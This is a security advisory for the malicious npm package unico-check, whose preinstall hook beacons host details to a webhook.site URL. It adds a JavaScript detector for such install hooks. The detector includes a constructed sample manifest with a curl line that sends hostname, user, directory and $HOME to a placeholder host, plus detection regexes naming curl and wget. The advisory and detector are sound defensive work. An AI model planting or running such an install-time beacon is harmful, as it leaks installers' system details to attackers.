MAL-2026-5830
Malicious code in unico-check (npm)
Details
--- _-= Per source details. Do not edit below this line.=-_
## Source: amazon-inspector (1945d7aee54e60800e30f150e6db8042fa3aee9ea99f6b5a4ab14e2a1c26571d)

package.json declares a preinstall lifecycle hook that runs `curl` against `https://webhook.site/fe1246c2-ac04-4493-b223-fe34ba26b79f`, passing the installer's hostname, current user, working directory, full `uname -a` output, and `$HOME` as query parameters. The beacon fires automatically on `npm install` with no user interaction.

The package ships no source files, declares no main entry, and uses the implausible version `9.9.9`, the canonical shape of a dependency-confusion / typosquat reconnaissance package targeting builds that may resolve a private `unico-check` from the public registry. The package's only effect on installation is to leak host identifiers to an anonymous, attacker-controlled webhook.site bin, staging follow-on compromise.
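A manifest-only check for the pattern described above, added here as an example; it is not Amazon Inspector's detection logic or code from the advisory. The rule names, regexes and both sample manifests are constructed assumptions, and the version test is a heuristic.

```javascript
// Added example: flag a package.json that matches the shape in this advisory.
// Rule names, regexes and sample manifests are constructed for illustration.
const INSTALL_HOOKS = ["preinstall", "install", "postinstall"];
// A network client or a literal URL inside an install-time hook.
const NET_CALL = /\b(curl|wget|Invoke-WebRequest)\b|https?:\/\//i;
// Shell expansions that resolve to host identifiers when the hook runs.
const HOST_ID = /\$\((hostname|whoami|pwd|uname[^)]*)\)|`(hostname|whoami|pwd|uname[^`]*)`|\$(HOME|USER|HOSTNAME|PWD)\b/g;
// Heuristic: 9.9.9, 99.99.99 and similar versions chosen to outrank a private package.
const PLACEHOLDER_VERSION = /^(9+)\.\1\.\1$/;

function auditManifest(manifestText) {
  const pkg = JSON.parse(manifestText);
  const scripts = pkg.scripts || {};
  const findings = [];
  for (const hook of INSTALL_HOOKS) {
    const cmd = scripts[hook];
    if (typeof cmd !== "string" || !NET_CALL.test(cmd)) continue;
    findings.push({ rule: "network-call-in-install-hook", hook });
    const ids = [...new Set(cmd.match(HOST_ID) || [])];
    if (ids.length > 0) findings.push({ rule: "host-identifiers-in-hook", hook, ids });
  }
  // Weak signals alone (types-only packages have no entry point either).
  if (!pkg.main && !pkg.exports && !pkg.bin) findings.push({ rule: "no-entry-point" });
  if (PLACEHOLDER_VERSION.test(String(pkg.version || ""))) {
    findings.push({ rule: "placeholder-version", version: pkg.version });
  }
  return findings;
}

// Quarantine for review only when an install hook reaches the network;
// the weak signals add context but do not trigger on their own.
function isLikelyBeacon(findings) {
  return findings.some((f) => f.rule === "network-call-in-install-hook");
}

// Constructed sample: same shape as the advisory, placeholder name and host.
const SUSPECT = JSON.stringify({
  name: "example-internal-pkg",
  version: "9.9.9",
  scripts: { preinstall: 'curl "https://collector.example.invalid/b?h=$(hostname)&u=$(whoami)&d=$(pwd)&o=$(uname -a)&home=$HOME"' },
});
// Constructed sample: ordinary library whose postinstall stays local.
const BENIGN = JSON.stringify({
  name: "example-lib",
  version: "1.4.2",
  main: "index.js",
  scripts: { test: "node test.js", postinstall: "node scripts/build.js" },
});
```

Run it over manifests fetched with scripts disabled (for example `npm install --ignore-scripts`), so the hook under inspection never executes.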
Affected packages
No fixed version published yet for unico-check (npm). Pin to a known-safe version or switch to an alternative.